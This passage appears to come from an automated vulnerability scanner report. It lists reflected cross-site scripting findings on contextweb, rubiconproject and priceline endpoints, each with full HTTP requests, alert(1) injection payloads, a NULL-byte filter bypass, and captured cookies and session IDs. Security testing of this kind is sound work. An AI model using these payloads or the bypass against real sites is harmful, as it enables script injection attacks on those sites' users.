Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Last-Modified: Mon, 26 Sep 02011 15:58:39 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:31 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:11 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250aa854";alert(1)//0151e8bd225";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

4.98. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f040"%3balert(1)//597ece38ae2 was submitted in the cwpid parameter. This input was echoed as 9f040";alert(1)//597ece38ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=5389369f040"%3balert(1)//597ece38ae2&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Last-Modified: Mon, 26 Sep 02011 15:56:15 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:26 GMT
Content-Length: 8886
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:06 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="5389369f040";alert(1)//597ece38ae2";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="5389369f040";alert(1)//597ece38ae2";var ct="106934";var cf="300X250";var cn="
...[SNIP]...

4.99. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d06a"%3balert(1)//2e758bc4f2d was submitted in the cwpnet parameter. This input was echoed as 2d06a";alert(1)//2e758bc4f2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=12d06a"%3balert(1)//2e758bc4f2d&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8858
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:33 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:13 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="12d06a";alert(1)//2e758bc4f2d";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...

4.100. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a59e1"%3balert(1)//f02f6e681c7 was submitted in the cwrun parameter. This input was echoed as a59e1";alert(1)//f02f6e681c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200a59e1"%3balert(1)//f02f6e681c7&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Mon, 26 Sep 02011 15:35:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:22 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:02 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200a59e1";alert(1)//f02f6e681c7";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase()
...[SNIP]...

4.101. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95803"%3balert(1)//aa35be3a797 was submitted in the cwtagid parameter. This input was echoed as 95803";alert(1)//aa35be3a797 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=10693495803"%3balert(1)//aa35be3a797 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Mon, 26 Sep 02011 15:44:29 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Sun, 02 Oct 2011 23:49:36 GMT
Content-Length: 8886
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:15 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="10693495803";alert(1)//aa35be3a797";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538936";var ct="10693495803";alert(1)//aa35be3a797";var cf="300X250";var cn="1";var epid="";var es
...[SNIP]...

4.102. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9992f"%3balert(1)//d829030aa57 was submitted in the cwwidth parameter. This input was echoed as 9992f";alert(1)//d829030aa57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=3009992f"%3balert(1)//d829030aa57&cwheight=250&cwpnet=1&cwtagid=106934 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Mon, 26 Sep 02011 15:44:29 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8858
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 02:36:08 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538936";var cwtagid="106934";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="3009992f";alert(1)//d829030aa57";var ch="250";var cads="0";var cp="538936";var ct="106934";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.to
...[SNIP]...

4.103. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7ee87%3balert(1)//7b85cacff43 was submitted in the cb parameter. This input was echoed as 7ee87;alert(1)//7b85cacff43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded7ee87%3balert(1)//7b85cacff43&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:39 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 968
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:39 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...
2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375,"}
]
};


try {
oz_onPixelsLoaded7ee87;alert(1)//7b85cacff43(oo_profile);
} catch(ignore) {}

4.104. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkInDate request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a59b"%3balert(1)//1f6f9173ddff10305 was submitted in the checkInDate parameter. This input was echoed as 6a59b";alert(1)//1f6f9173ddff10305 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011%006a59b"%3balert(1)//1f6f9173ddff10305&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:32 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=AA4C8B607D54B9201A4270A1619E0E91; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 492633


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
] = "/hotel/hotelResultsListView_Change";
c2c["pricePoint"] = "1414";
c2c["numRooms"] = "1";
c2c["initialHotelCount"] = "137";
c2c["travelEndDate"] = "10/16/2011";
c2c["travelStartDate"] = "10/09/2011.6a59b";alert(1)//1f6f9173ddff10305";
c2c["vid"] = "v2011100300373188ec0127";


function c2cUpdateData(strKey, strValue){
   c2c[strKey] = strValue;
}

ATGSvcs.setUOID(200106297609);
</script>
...[SNIP]...

4.105. http://travela.priceline.com/hotel/newHotelSearch.do [checkInDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf33"style%3d"x%3aexpression(alert(1))"412a6bf160a3d07c7 was submitted in the checkInDate parameter. This input was echoed as edf33"style="x:expression(alert(1))"412a6bf160a3d07c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y&cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011edf33"style%3d"x%3aexpression(alert(1))"412a6bf160a3d07c7&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
